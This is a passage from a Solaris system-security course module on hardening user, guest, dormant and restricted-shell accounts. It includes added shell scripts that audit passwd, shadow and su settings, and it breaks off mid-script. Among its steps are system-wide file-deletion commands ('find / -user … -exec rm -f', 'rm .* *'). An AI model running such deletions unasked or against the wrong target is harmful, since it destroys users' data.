● Company user files from guest users?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Garfinkel, Simson and Gene Spafford. Practical UNIX & Internet Security. O'Reilly & Associates, Inc., 1996.

● Stoll, Clifford. The Cuckoo's Egg. Pocket Books, 1995.


Administering Regular Users

An intruder gaining access to one or more of your accounts is a common breach of system security. Setting up accounts in the most secure manner is, therefore, of utmost importance.

This module does not present the commands to add a user – use your preferred method (for example, admintool or useradd). It is never advisable to manually edit the /etc/passwd and /etc/shadow files because if these files are corrupted, it might not be possible to log into the system.

Determining User and Group IDs

User IDs (UIDs) are the mechanism that identifies users in UNIX. The kernel and the file system work only with the numeric UID; the /etc/passwd file maps user names (which are there for your convenience) to UIDs.


A UID is a 32-bit signed integer between 0 and 2147483647, where 0 is a special UID that denotes the superuser account. This account is traditionally named root, but any user name for a superuser account is valid. Any account that has a UID of 0 has superuser privileges.

Traditionally, system accounts are given UIDs between 0 and 99, and user accounts start at UID 100. Many system accounts are created at installation time in the /etc/passwd file. Most of these accounts are required for the correct operation of the system and should not be modified. A possible exception is the uucp account, an account that makes uucp system connections. However, because the uucp account is rarely used, it can usually be deleted.

Use the logins command to list system and user accounts on your system:

● logins -s – Lists system accounts

● logins -u – Lists user accounts

Implications of Duplicate User IDs

It can be dangerous to have accounts with duplicate UIDs. Because the kernel identifies a process and a file's owner only by the numeric UID, duplicate UIDs give multiple users with different user names free access to each other's files; they can also use the kill command to terminate each other's running programs. This mistake is easy to make if you manually edit the /etc/passwd and /etc/shadow files.

Note – Manually editing either or both of the /etc/passwd and /etc/shadow files is not recommended, because mistakes in these files can prevent many system utilities from working and, at worst, make it impossible to log in to the system.

You can use the following logins command every time a new account is added, or when you suspect that a duplicate account might exist. In this example, users groucho and harpo have a duplicate UID.

# logins -d
groucho   401   other   401
harpo     401   other   401
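The following script is an added example, not part of the original course. It makes the same two checks that logins -d and the UID-0 rule above call for, but with awk over a passwd file, so it can be run against /etc/passwd from cron or against a copy taken from a suspect host where the logins binary itself is not trusted. SAMPLE_PASSWD is constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original course). The same checks that
# logins -d and a UID-0 audit make, done with awk over a passwd file so
# they can be run against a copy taken from a suspect host, or against
# /etc/passwd from cron. SAMPLE_PASSWD is constructed for illustration.

SAMPLE_PASSWD='root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
ftfp:x:0:1:file transfer:/:/bin/sh
groucho:x:401:1:Groucho Marx:/export/home/groucho:/bin/ksh
harpo:x:401:1:Harpo Marx:/export/home/harpo:/bin/ksh
chico:x:402:1:Chico Marx:/export/home/chico:/bin/ksh'

# duplicate_uids  (passwd on stdin)
#   Prints "name uid" for every account whose UID is shared, in file order,
#   which is what logins -d reports.
duplicate_uids() {
    awk -F: '
        { name[NR] = $1; uid[NR] = $3; count[$3]++ }
        END { for (i = 1; i <= NR; i++) if (count[uid[i]] > 1) print name[i], uid[i] }'
}

# extra_superusers  (passwd on stdin)
#   Prints every account other than root that has UID 0. Any such account
#   is a full superuser whatever its name.
extra_superusers() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# audit_passwd FILE: run both checks and print what they found;
#   exit status 0 when the file is clean, 1 when anything was reported.
audit_passwd() {
    dups=$(duplicate_uids < "$1")
    extras=$(extra_superusers < "$1")
    [ -n "$dups" ]   && printf 'duplicate UIDs:\n%s\n' "$dups"
    [ -n "$extras" ] && printf 'UID 0 accounts besides root:\n%s\n' "$extras"
    [ -z "$dups$extras" ]
}
```

Because the exercise's ftfp account shares UID 0 with root, both checks report it: duplicate_uids lists root and ftfp together, and extra_superusers names ftfp on its own. The deliberate duplicate system accounts discussed next also appear in the first list, so keep a record of the ones you created on purpose and compare against it.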


An exception to this 'no duplicate UIDs' rule is when you want to create one or more duplicate system accounts. Use this exception if multiple people have access to a system account (including the superuser account) and you want to track their individual activities using the audit trail. A duplicate system account also allows you to disable access for one system account user without having to disable access for all users. Using duplicate system accounts has the advantage that the passwords do not have to be communicated or shared among several people. A major disadvantage is that it gives intruders more system accounts to attack, and each duplicate carries the full privilege of the original, so it needs the same password quality and login restrictions.


Selecting and Creating Groups and Group IDs (GIDs)

Groups provide a useful way to group users. Unfortunately, the group mechanism is rarely used effectively.

Every UNIX user belongs to one or more groups. By grouping users together, privileges can be easily assigned to a subset of users. A user's primary group is stored in the /etc/passwd file. A user can become a member of additional groups by adding entries to the /etc/group file.

The default group for the useradd command is other (GID 1), and on many systems all users are in this other group. This means that they can all read each other's files if the group read permission is set (which is the default unless the umask1 value has been changed). For this reason, some sites have a policy of giving each user a unique primary group (the same GID number as the UID).

1. The umask command is described in Module 8, "File System Attacks".


Customizing Default Profiles

Many files are read by various shell programs, either at login or subsequently (a shell is invoked every time a shell script is run), which can set system variables and configure the environment. In Table 5-1, '~' refers to a user's home directory.

Table 5-1 Profiles Run by Traditional Shell Programs

File            Shell          When Processed

/etc/profile    sh, jsh, ksh   Read at login for all users. Use this file to set system-wide variables.

/etc/.login     csh            Read at login for all users. Use this file to set system-wide variables.

~/.profile      sh, jsh, ksh   Tailors a user's personal environment. It is processed after the /etc/profile file.

~/.kshrc        ksh            Read whenever a Korn shell is run. It is processed after the /etc/profile and ~/.profile files at login. Reading this file can be disabled for ksh scripts if you use the set -o privileged or ksh -p commands. You can designate a different file by changing the ENV variable.

~/.cshrc        csh            Read whenever a C shell is invoked. It is read before the .login file at login time.

~/.login        csh            Read by the C shell at login.

~/.logout       csh            Read by the C shell at logout.

Use the /etc/profile or /etc/.login files to set default values for system-wide variables and parameters, such as a secure PATH variable and the umask command. Because the file named by ENV (~/.kshrc by default) is under the user's control and is read by every Korn shell, including shells started to run scripts, it is a favourite place for an intruder to plant commands; scan it along with the other startup files.

Solaris 8 OE also provides additional shells which are enhancements of the traditional shells, as listed in Table 5-2. These shells can use the configuration files of a traditional shell as well as their own specific files.

Table 5-2 Profiles Used by Other Shell Programs

Shell   Profile Files

bash    /etc/profile ~/.bash_login ~/.bash_profile ~/.bashrc

tcsh    /etc/csh.cshrc /etc/csh.login ~/.tcshrc ~/.history ~/.login ~/.cshdirs ~/.logout

zsh     /etc/zprofile /etc/zshenv /etc/zlogin /etc/zlogout ~/.zshenv ~/.zprofile ~/.zlogin ~/.zshrc ~/.zlogout


Defaults for the .login, .profile, and .cshrc files are provided in the /etc/skel directory, but you can add any additional files that you require. The files in the /etc/skel directory should be edited to reflect local requirements. The useradd command copies all files in the /etc/skel directory to the user's home directory when you use the -m option.

Note – The files in the /etc/skel directory are named with a prefix of local. (for example, local.profile). If you use the useradd command to create new user accounts, rename the copies in the new home directory to remove this prefix; otherw ise they are copied as, for example, local.profile, and are never executed, so the user starts without the PATH and umask settings from your template. If you use the Admintool tool to add user accounts, then this tool removes the prefix local from the name as it is copied.


Setting Accounts to Expire

There might be occasions when you want to prevent a user from logging into an account. This might be due to the user's temporary extended absence or as a precursor to permanently deleting the account.

The usermod command, which you can use to make changes to account parameters, such as user ID, group ID, home directory path, and so on, can also set account inactivity and expiration times.

The relevant options for the usermod command are:

-e – Sets the date when the account expires

-f – Sets the number of days that the account must be unused before it expires

For example, to make sure that a user's account expires if the user has not logged in for 15 days or longer, use:

# usermod -f 15 username


The expiration information is stored in the /etc/shadow file.

To automatically expire an account on a particular date, use a command such as:

# usermod -e 12/31/2001 username

Note – You can use this command with a date format that is listed in the /etc/datemsk file. Many date formats are predefined in this file. See the getdate(3C) manual page for a list of the conversion specifications.

This command expires the account at the end of the day. It is not possible to enter today's date, so you cannot use usermod -e to immediately expire an account. Instead, use:

# passwd -l username

This command locks the account by changing the user's encrypted password field to *LK*, which no password can match, so the account is immediately unusable by password. Locking defeats only password authentication: a login that presents no password (for example, rlogin through a .rhosts entry) is not stopped by it, which is why an expiry date or a login shell such as /usr/bin/false is the stronger block. To reactivate the account, use the passwd command to give the user a valid password.

To reactivate an account with a set expiration date, clear the date:

# usermod -e "" username


Administering Superuser Accounts

Any user with a UID of 0 is a superuser on the system. The all-powerful superuser account is a major security weakness in the UNIX operating system. All permission checks are bypassed for the superuser, so a mistyped command could seriously damage the system. The superuser account is, therefore, not for casual use. All system administrators should have a regular account that they use whenever the superuser privileges are not required. The golden rule is: Only be the root user if you need to be the root user.


Restricting Root Logins

In the Solaris OE, you can configure the system so that users cannot log in directly as the root user. Anyone who wants to become the superuser must first log into a regular account and then use the su command to spawn a privileged shell. The advantages of this are:

● Tracking who is using the root account becomes easier (every su attempt is recorded in the sulog file together with the originating login name).

● Intruders have to break into two accounts, the non-administrator user and the root user, to obtain superuser status.

● The password for the root account cannot be obtained from a spoof login program left running on a terminal.

Caution – It is bad practice to log in as the root user across the network, because the plain text password is available to any intruder running a network sniffer program. All users logging in remotely with the telnet or rlogin commands create the same problem, so other mechanisms should be considered to allow remote access without transferring unencrypted passwords across the network. Two such methods are setting up a trusted host (see Module 13, "Security Network Services") and using a secure shell (see Module 16, "Securing Remote Access"). Of the two, only a secure shell also protects the session contents; host trust merely avoids sending a password and relies on the claimed identity of the remote host.

To disable direct login through the root account, ensure that the line:

CONSOLE=/dev/console

is not commented out in the /etc/default/login file. This ensures that the root user can only directly log in on the device defined as the console. Leaving the variable out, or commenting it out, allows root to log in from any terminal or network connection.

Note – This solution also disables remote login to the root account when using the telnet or rlogin commands, because those logins arrive on a pseudo-terminal, not the console.
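The following script is an added example, not part of the original course. It covers two of the controls in this section: it classifies every entry of a shadow file as locked, expired, inactive, without a password, or active, and it checks that /etc/default/login still carries an uncommented CONSOLE line. SAMPLE_SHADOW is constructed; the inactivity test measured from the last password change is an assumption made because the shadow file alone does not record logins.

```shell
#!/bin/sh
# Added example (not from the original course). Two checks for the
# account controls in this section: classify every entry of a shadow file
# as locked, expired, inactive, no-password or active, and confirm that
# /etc/default/login still restricts root logins to the console.
# SAMPLE_SHADOW is constructed; the day numbers are days since 1 Jan 1970,
# which is how the shadow file records lastchg and expire.

SAMPLE_SHADOW='root:XkPmv.MoHPpaA:11500::::::
eve:*LK*:11480::::::
guest:Abc1Xyz2Qwerty:11400:::::11550:
mallory:Abc1Xyz2Qwerty:11300::::15::
alice:Abc1Xyz2Qwerty:11495::::::
nobody:NP:6445::::::'

# account_status TODAY  (shadow on stdin; TODAY in days since the epoch)
#   Prints "name status" per entry. Fields: 1 name, 2 password, 3 lastchg,
#   7 inactive, 8 expire. An account expires after the expire day, so a
#   value equal to TODAY is still active, matching usermod -e behaviour.
#   Assumption: inactivity is measured here from the last password change,
#   because the shadow file does not record logins; login itself uses
#   the last login time. TODAY can be computed on Solaris 8 with
#   perl -e 'print int(time/86400)'.
account_status() {
    awk -F: -v today="$1" '
        {
            status = "active"
            if (substr($2, 1, 4) == "*LK*")                        status = "locked"
            else if ($2 == "NP")                                   status = "nopasswd"
            else if ($8 != "" && $8 + 0 < today + 0)               status = "expired"
            else if ($7 != "" && $3 != "" && today - $3 > $7 + 0)  status = "inactive"
            print $1, status
        }'
}

# console_restricted FILE: true when FILE (normally /etc/default/login)
# has an uncommented CONSOLE= line, so root may log in only on that device.
console_restricted() {
    grep '^[[:space:]]*CONSOLE=' "$1" > /dev/null 2>&1
}
```

Run account_status "$TODAY" < /etc/shadow from a weekly cron job and compare the output with the previous run: an account that changes from locked or expired back to active without a ticket is exactly the reactivated dormant account the next section warns about. console_restricted /etc/default/login belongs in the same job, since a single edit to that file reopens remote root logins.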


Securing Guest Accounts

Having one or more guest accounts on your system is a bad idea. A guest account is a possible entry point at which an intended temporary user can damage the system, and a guest account is also a common target for outside intruders. Guest accounts are often set up and forgotten, leaving a gaping hole in security. The situation is worsened by the fact that passwords assigned to guest accounts are usually very simple, written down, or given to someone over whom you have little control.

If you need to create a guest account, you should follow a few rules. They are:

● If possible, create the account on a stand-alone machine and shuttle data to it using removable media, such as tapes or diskettes.

● If the account must be on the network, attempt to put its home directory on a separate partition or file system with restricted mount permissions.

● Never create permanent guest accounts.

● Guest accounts must be used by one user only, and never shared, so that individual accountability is maintained.

● Create the account and use a restricted shell (see "Limiting User Options With Restricted Shells" on page 5-27) that prohibits the user from browsing regular user accounts.

● Give the guest user access only to the software and commands that the user needs to do the job required. Be suspicious of requests for SUID programs.

● Limit the PATH variable and other environment variables to only what is needed.

● Create the account just before the guest user needs it, and delete it immediately following the user's exit. Disable the account in the evenings so that it is not accessible except when the user is under trusted supervision.

● Set the account to expire automatically as soon as the user no longer requires it. The account can always be reactivated later.

● Frequently scan guest directories for hidden or questionable files, and scan guest startup files for questionable commands or scripts.

● If possible, log in for the guest user or, at least, generate a password daily so that the guest user has to pick up each day's password before starting work. This limits the opportunities for the guest user to hand the password to a third party.

● Refuse to set up SUID status for specific programs or scripts that the guest user requires or brings with them, and remove the software until you have had a chance to test it thoroughly. Ensure that you have the source code for the software so that you, or an experienced programmer, can inspect it. Compile the software on your system and use your compiled version, not one provided by the guest user.

● Monitor guest user activity with the snoop command or ps if you suspect them of questionable activity.

Guest accounts are for users you are unfamiliar with. Wherever possible, create a standard account with restrictions. If something goes wrong, refer to your security policy for appropriate action.


Protecting Dormant Accounts

A popular point of attack is the dormant user account. Accounts belonging to employees who have left the company or those who are on extended leave are perfect targets because activity on these accounts is not likely to arouse suspicion. Intruders can take their time when using such accounts and continue to do serious damage for extended periods of time.

Note – One of the most famous accounts of serious international espionage using computers began with the entry of an intruder, later found to be working for Soviet intelligence, into the computer facility of the Lawrence Berkeley Laboratory using a dormant account. For more than a year, the attacker was tracked as he broke into hundreds of university and military computers worldwide. This interesting story is the plot of a popular book, The Cuckoo's Egg, by Clifford Stoll. Although this is an extreme example, the point is clear: manage dormant accounts with care.


There are some easy ways to prevent login to an account:

● Change the account password so it cannot be used, using:

# passwd -l username

which puts *LK* in the encrypted password field.

● Change the account login shell to a program that prevents login (such as /usr/bin/false), using:

# usermod -s /usr/bin/false username

● Expire the account, using:

# usermod -e date username

● Set the account to expire automatically if it has been inactive for a specific number of days, using:

# usermod -f N username

where N is the number of days of inactivity allowed before the account is inactivated.

● Delete the account using the userdel command (see "Deleting Dormant Accounts" on page 5-19).

Then use the passwd or usermod commands to reactivate an account at a later date (see the example on page 5-12). Note that locking the password or expiring the account does not by itself stop cron or at jobs the account already owns; remove those as well.


Deleting Dormant Accounts

The best protection against the misuse of dormant accounts is to delete them as soon as they become inactive. You must then decide what to do with user files and emails. The easiest and safest thing to do is to delete all files and emails, but there might be circumstances where this is not immediately possible (for example, when a management decision is required on what to do with the data).

To delete a user and the user's home directory, use:

# userdel -r username

This command only deletes the user's home directory. Users might have files in other parts of the file system (for example, they might have a mailbox in /var/mail and crontabs in /var/spool/cron/crontabs). Therefore, search the file system to ensure that the deleted user did not leave files elsewhere.

To get a list of all the files owned by the deleted user, use the command:

# find / -user username -ls

Once the passwd entry is gone, username no longer resolves, so either run the search before userdel or give find the numeric UID instead (for example, find / -user 401 -ls); files whose owner has no passwd entry also show a bare number in the owner column of ls -l output.


Inspect this list to verify that there has been no questionable activity by the user which leaves the system vulnerable. Delete the files using the command:

# find / -user username -exec rm -f {} \;

If you must retain the files, reassign the files to another user on the system. To change the ownership of all the files that are to be retained, and then move the files to the new owner’s directory, change to the user’s home directory and use:

# find . -exec chown new_user {} \;

Note – Do not reuse the UIDs of deleted accounts because the practice of reusing UIDs can give rise to problems if files are restored from backup tapes (for example, the files of a deleted user can become owned by the new user with the same UID). Reusing UIDs also makes tracking user actions harder. For example, if a suspicious file is owned by current user B but dated when user A (who had the same UID) had access to the system, you cannot be sure who is responsible for the file.

Remove any cron or at jobs belonging to deleted accounts because these leave the system vulnerable to attack by disgruntled, outgoing employees and intruders.


Checking User Security

Using the sulog file to monitor successful and failed attempts of the su command to change to another user has already been presented (see Module 2, “Using Solaris™ OE Log Files”). This section presents the parameters you can configure to make using the su command more secure.

Configuring the /etc/default/su File

The following is a list of the default variables that you can set in the /etc/default/su file to control the characteristics of the su command and its logging:

● SULOG=/var/adm/sulog – The SULOG variable specifies the path name of the log file, normally set to the /var/adm/sulog file.

● CONSOLE=/dev/console – If the CONSOLE variable is defined, all attempts to use the su command to become the root user are logged on the console. Direct this output to the system administrator’s workstation, where an open console window is available for monitoring su attempts as they happen.

● PATH=/usr/bin – The PATH variable sets the available command path when the UID is changed to a normal user. Keep the number of entries for the PATH variable to a minimum.

● SUPATH=/usr/sbin:/usr/bin – The SUPATH variable sets the available command path when the UID is changed to root. Ensure that the current directory is not included in this path, either explicitly with ‘.’ or implicitly with a leading or trailing colon.

● SYSLOG=YES – Set the SYSLOG flag to yes to indicate that su command usage should be logged by syslogd.
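The following POSIX sh script is an added example, not part of the Sun course: it audits a file in the /etc/default/su format against the five settings just listed, flagging missing logging settings and any PATH or SUPATH that reaches the current directory explicitly (a ‘.’ element) or implicitly (a leading, trailing or doubled colon). The two sample files it writes are constructed for the demonstration.

```shell
# Added example (not part of the Sun course): audit an /etc/default/su
# style file for the settings listed above. Sample files are constructed.

# Print the value of KEY from a KEY=VALUE defaults file; commented-out
# or absent keys print nothing. $1 = file, $2 = key.
su_default() {
    sed -n "s/^[[:space:]]*$2=//p" "$1" | tail -n 1
}

# A search path is safe when no element is the current directory: no "."
# element and no empty element (leading, trailing or doubled colon).
path_is_safe() {
    case ":$1:" in
        *::*|*:.:*) return 1 ;;
    esac
    return 0
}

# $1 = variable name, $2 = value; prints a finding and returns 1 if unsafe.
check_path_var() {
    if [ -z "$2" ]; then
        echo "$1 is not set"; return 1
    fi
    if ! path_is_safe "$2"; then
        echo "$1 includes the current directory: $2"; return 1
    fi
    return 0
}

# Audit one file: prints one finding per line, returns the number of findings.
audit_su_defaults() {
    f=$1; n=0
    [ -n "$(su_default "$f" SULOG)" ] || { echo "SULOG is not set: su attempts are not written to a log file"; n=$((n+1)); }
    [ -n "$(su_default "$f" CONSOLE)" ] || { echo "CONSOLE is not set: root su attempts are not echoed to the console"; n=$((n+1)); }
    case "$(su_default "$f" SYSLOG)" in
        [Yy][Ee][Ss]) ;;
        *) echo "SYSLOG is not YES: su usage is not sent to syslogd"; n=$((n+1)) ;;
    esac
    check_path_var PATH "$(su_default "$f" PATH)" || n=$((n+1))
    check_path_var SUPATH "$(su_default "$f" SUPATH)" || n=$((n+1))
    return "$n"
}

# Constructed sample 1: a weakened file (console logging commented out,
# syslog off, current directory reachable through both paths).
write_weak_sample() {
    cat > "$1" <<'EOF'
SULOG=/var/adm/sulog
#CONSOLE=/dev/console
PATH=/usr/bin:
SUPATH=/usr/sbin:/usr/bin:.
SYSLOG=NO
EOF
}

# Constructed sample 2: the settings exactly as listed above.
write_hardened_sample() {
    cat > "$1" <<'EOF'
SULOG=/var/adm/sulog
CONSOLE=/dev/console
PATH=/usr/bin
SUPATH=/usr/sbin:/usr/bin
SYSLOG=YES
EOF
}

# Run the audit over both samples; succeeds when the weak file yields
# four findings and the hardened file none.
demo_su_audit() {
    tmp=$(mktemp)
    write_weak_sample "$tmp"
    weak=0; audit_su_defaults "$tmp" || weak=$?
    write_hardened_sample "$tmp"
    hard=0; audit_su_defaults "$tmp" || hard=$?
    rm -f "$tmp"
    echo "findings: weak=$weak hardened=$hard"
    [ "$weak" -eq 4 ] && [ "$hard" -eq 0 ]
}
demo_su_audit
```

On a live system the same audit is run as audit_su_defaults /etc/default/su; the path check is deliberately strict, so a commented-out line counts as "not set" just as the su command would treat it.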


Classifying Non-Login Accounts

Many accounts are required to maintain the system. These include:

● daemon

● bin

● sys

● adm

Never use these accounts for login purposes, and place the code NP in the password field of /etc/shadow instead of a valid encrypted password.

Other accounts that you should not use for login purposes are software accounts that manage software packages. For example, the Oracle database is normally installed under the Oracle user account name. These accounts should not have a valid password. Avoid this by locking these accounts.


To lock an account, use the command:

passwd -l username

This command inserts *LK* into the password field in the shadow password file. This suggests that the account is temporarily locked and might be enabled in the future (this is not the same as a non-login account).

For genuine non-login accounts, edit the /etc/shadow file and enter the NP password manually:

daemon:NP:6445::::::
bin:NP:6445::::::

Note – You can use the Common Desktop Environment (CDE) program admintool to set an account with no password (NP).


Restricting Functionality Using a Non-Login Shell

As an additional precaution, you can set the default shell for non-login accounts to a program other than /bin/sh. A good program choice is /usr/bin/false, which causes any login attempt to exit immediately. The /etc/passwd file entry would look like this:

bin:x:2:2::/usr/bin:/usr/bin/false

You can change the shell using the -e option to the passwd command, which prompts you for a new shell program:

# passwd -e username
Old shell: /bin/sh
New shell: /usr/bin/false

The new shell you enter must be a valid shell listed in the file /etc/shells (see “Interpreting the /etc/shells File” on page 5-25).

Alternatively, use the usermod -s command to change a user’s shell:

# usermod -s /usr/bin/false username


If the shell is set to a non-login program, then any attempt to use the su command to change to that account fails. If you must use the su command to go to the account, do not use this non-login shell technique.

Interpreting the /etc/shells File

The /etc/shells file is a list of valid login shells used by the passwd -e command. By default, this file does not exist, so you must create it to list the valid shells that a user may use for logins. A suitable default list for valid shells is:

● /bin/sh

● /usr/bin/csh

● /usr/lib/rsh

● /usr/bin/rsh

● /usr/bin/pfsh

● /usr/bin/pfcsh

● /usr/bin/ksh

● /usr/bin/bash

● /usr/bin/rksh

● /usr/bin/jsh

● /usr/bin/pfksh

● /usr/bin/zsh

You can have a shell that is not in this list, but only by manually editing the /etc/passwd file. Accounts that already have unusual shells (such as /usr/lib/uucp/uucico for uucp) are not affected when you create the /etc/shells file.

Note – The useradd and usermod commands are not constrained by the /etc/shells file when you specify the user’s login shell. You can also specify the default shell in the /etc/default/useradd file.

Preventing Unauthorized cron Entries

The crontab entries for special non-login accounts (especially bin or adm) are sometimes used by successful intruders to plant rogue programs into the system. If the administrator detects a break-in and repairs the system, these cron files can remove the repair or create new back doors which allow intruders to break back into the system.

Disgruntled outgoing employees can also leave time-bombs in these cron files.

The administrator rarely changes the cron files after the system is set up, and is therefore unlikely to notice illegal entries into the files. Use techniques such as fingerprinting with programs like TripWire (see Module 9, “Auditing File Systems”) to monitor illegal modifications to these cron files.


Limiting User Options With Restricted Shells

A restricted shell is a standard Korn or Bourne shell running with certain restrictions applied to its commands and features. You cannot use restricted shells in conjunction with the CDE dtlogin program.

The restricted shells are:

● /usr/bin/rksh – Restricted Korn shell

● /usr/lib/rsh – Restricted Bourne shell

Note – The remote shell /usr/bin/rsh (sometimes called /usr/bin/remsh) is often confused with the restricted Bourne shell, which resides in the /usr/lib/rsh directory.


Assessing the Limitations Enforced by Restricted Shells

The primary purpose of a restricted shell is to allow particular users limited access to system tools. There are various reasons for restricting shells, but security is the primary reason. Correctly configured restricted shells give users access only to those tools that they need to perform allocated tasks, and prevent them from running other utilities.

Generally, the limitations enforced by restricted shells are:

● The user cannot change the working directory.

● The user cannot execute the PATH environment variable.

● The user cannot execute commands that contain a slash character, so that the user is restricted to:

● Built-in shell commands that are not restricted

● Aliases that do not expand to commands containing the / operator

● Commands on the defined search path

● The user cannot redirect output using the > or >> operators, which prevents them from creating files or overwriting existing files (such as .profile).

● If the user runs a sub-shell, the sub-shell is also restricted if it is the same shell as the current one. For example, running ksh from rksh results in a restricted shell, but running csh from rksh does not. However, restricted users can be prevented from running sub-shells (see “Configuring a Restricted Shell” on page 5-29).


Configuring a Restricted Shell

There are several ways to set up a restricted shell login. The key requirements are:

● Users cannot edit or modify the login environment (profiles and so on).

● Users cannot create configuration files in their home directories.

● Users cannot run unrestricted shells, and they have access only to the limited set of commands specifically required for their job function.

Note – The limitations enforced by a restricted shell do not apply when executing the login profile (the .profile or .kshrc).


Complete the following steps to restrict the user’s account.

Note – If the home directory and search path are not properly configured, as described in this section, the purpose of having a restricted shell is defeated.

1. Create an account for the user, using either the AdminTool or the useradd command.

a. Make sure that you select a restricted shell when creating the account.

b. Use the useradd command with the -s option to specify the restricted shell. To use a restricted Korn shell, for example, use:

# useradd -m -s /usr/bin/rksh alice

2. In the user’s new home directory, delete all existing files, including files such as .cshrc, .login, and .profile.

3. Create a new .profile file containing the two lines:

PATH=
SHELL=/usr/bin/false

Caution – If you set the SHELL variable, some programs that use this variable to determine what shell environment to execute might be prevented from working correctly.

4. Create empty files for all the configuration files you can think of. Obvious ones are:

● .kshrc

● .cshrc

● .login

● .logout

● .rhosts

● .exrc

● .mailrc

● .netrc

5. Change the ownership of the user’s home directory and all files created to be root files, and set them as read-only for owner, group, and others. For example (assuming the Korn shell):

# chown -R root ~alice
# chmod -R a-w,a+r ~alice

New users can now use the restricted shell. However, this shell is so restricted that all users can do is log in and log out. No other commands are available and users do not have write permission to their own directory. You must now configure whichever commands and programs are necessary to enable users to carry out their job.

Consider whether the restricted environment is for a single user or a group of users with identical requirements.


6. Create a separate directory for the restricted user’s commands, and set the directory files to read only. The two common approaches are:

● For a single user, create a bin directory in the user’s home directory and set the path in .profile to:

PATH=$HOME/bin

● For multiple users, create a directory called /usr/rbin and set the path in .profile to:

PATH=/usr/rbin

Whichever approach you take, the directory must be owned by the root user and be read-only to the world. For example:

# mkdir /usr/rbin
# chmod a=rx /usr/rbin


7. Decide on the list of commands that the user must have, and create links to those commands from your restricted binary directory. Do not take copies, because this complicates applying security patches, which only update the original binaries and not those in your restricted bin directory. You can use hard links for the multiple users’ version but must use symbolic links for a directory in the users’ home directory (because the home directory is likely to be on a different file partition).

# ln /usr/bin/ls /usr/rbin
# ln /usr/bin/passwd /usr/rbin


8. Create a local working directory for users to work and reside in. Give users ownership of the directory together with read, write, and execute permissions.

# mkdir ~alice/work
# chown alice ~alice/work
# chmod u=rwx,og= ~alice/work

9. Place users automatically in this directory when they first log in by adding the following to the end of the .profile file:

cd $HOME/work

10. Tighten the profile by using the trap and umask commands so that the final profile (for multiple restricted users) looks like this:

trap "" 2 3
umask 077
PATH=/usr/rbin
SHELL=/usr/bin/false
cd $HOME/work
trap 2 3


11. Set the password for the user account and force the user to update the password after first login:

# passwd username
New password:
Re-enter new password:
passwd (SYSTEM): passwd successfully changed for <username>
# passwd -f username

You can now use the account. On login, the user must enter a new password and the current working directory is set to an empty directory that utility programs can use to store files. The user cannot create files directly from the restricted shell.

Furthermore, most utility configuration files exist with a standard (secure) setting and are not writable by the user (.profile, .netrc, and .rhosts are particularly important). Even if the restricted shell setup is not perfect and a utility program allows the user to try to write to these files, the user cannot do so because the files are read-only and owned by the root user.


Exercise: Securing Guest and Restricted Accounts

In this exercise, you complete the following tasks:

● Configure a guest account to automatically expire

● Create a new user with a restricted shell account

Preparation

No preparation is required for this exercise.

Tasks

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Creating a Guest Account With Automatic Expiration

You have been asked, as your company’s system administrator, to set up a guest account for a temporary technical writer who is familiar with the vi editor. The writer will be at your work site for one day, but additional days might be needed. Make the necessary arrangements to set up the guest account as follows:

1. Add a new account with the user name guest .

a. Make guest a member of the group named guests .

b. Create the guest home directory in the /export/home directory.

2. Set the account to expire tomorrow.

3. Set the password to one that you believe to be secure. This password will be checked as part of the exercises in the next module.

4. Make sure that the UID is not a duplicate of others already in the file.

5. Check that you can log in using the guest account.


Task – Configuring a Restricted User Account

Create a restricted user account for a new user called charles. Set up the system so that you can add additional restricted users with the same requirements as charles (in other words, set up a shared bin directory).

The user charles must run the following commands:

● ls

● date

● vi

● more

● passwd

The user charles should not be able to edit any of the files in his home directory.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following are the solutions for the tasks defined in the preceding section.

Creating a Guest Account With Automatic Expiration

Create a guest account with automatic expiration.

1. Create the guest account using useradd or admintool .

2. Use usermod -e tomorrow's date to automatically expire the account.

Configuring a Restricted User Account

1. Configure a restricted user account.

a. Create the restricted binary directory for all restricted users:

# mkdir /usr/rbin
# cd /usr
# ln bin/ls rbin
# ln bin/date rbin
# ln bin/vi rbin
# ln bin/more rbin
# ln bin/passwd rbin
# chown root /usr/rbin
# chmod 555 /usr/rbin

b. Create the user charles and set the password:

# useradd -m -s /usr/bin/rksh charles
# passwd charles
# passwd -f charles

c. Set charles’ home directory to be owned by the root user (readable by all) and create empty configuration files for popular programs:

# cd ~charles
# rm .* *
# chmod 555 .
# touch .profile .kshrc .exrc .rhosts .netrc
# chmod 444 .profile .kshrc .exrc .rhosts .netrc
# chown -R root /export/home/charles


d. Set the profile to restrict the PATH variable to be /usr/rbin and set the SHELL variable to a non-shell program. Set the current directory to be the working directory:

# vi .profile
trap "" 2 3
umask 077
PATH=/usr/rbin
SHELL=/usr/bin/false
cd $HOME/work
trap 2 3

e. Create the working directory.

# mkdir work
# chmod 755 work
# chown charles work

f. Check that the account looks okay.

# ls -l

2. Log in as charles and check that the restrictions have been applied correctly. In particular, make sure that charles:

● Cannot edit .profile or any other configuration file in his home directory

● Cannot run shell escape commands from within vi

● Can only run the restricted list of commands (that is, check that charles cannot run /bin/sh)
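The POSIX sh script below is an added example (not the course's own material) that serves both the procedure in “Configuring a Restricted Shell” (steps 1 to 10) and the solution above: it builds the restricted-account skeleton in a scratch directory and then verifies the properties the text relies on, namely read-only dotfiles and home directory, a private work directory, a profile whose PATH points only at the restricted bin directory, and a bin directory that holds links rather than copies. It runs unprivileged, so the chown -R root step is left out and the scratch links are symbolic (a scratch directory may be on another file system); on a real system that chown step is still required. The work directory mode follows step 8 (u=rwx,og=).

```shell
# Added example (not part of the Sun course): build the restricted home
# from the steps above in a scratch directory and verify it. Unprivileged,
# so ownership is not changed to root here.

RBIN_CMDS="ls date vi more passwd"      # the commands charles may run
DOTFILES=".profile .kshrc .cshrc .login .logout .rhosts .exrc .mailrc .netrc"

# Write the final profile from step 10; $1 = home directory, $2 = restricted bin dir.
write_restricted_profile() {
    cat > "$1/.profile" <<EOF
trap "" 2 3
umask 077
PATH=$2
SHELL=/usr/bin/false
cd \$HOME/work
trap 2 3
EOF
}

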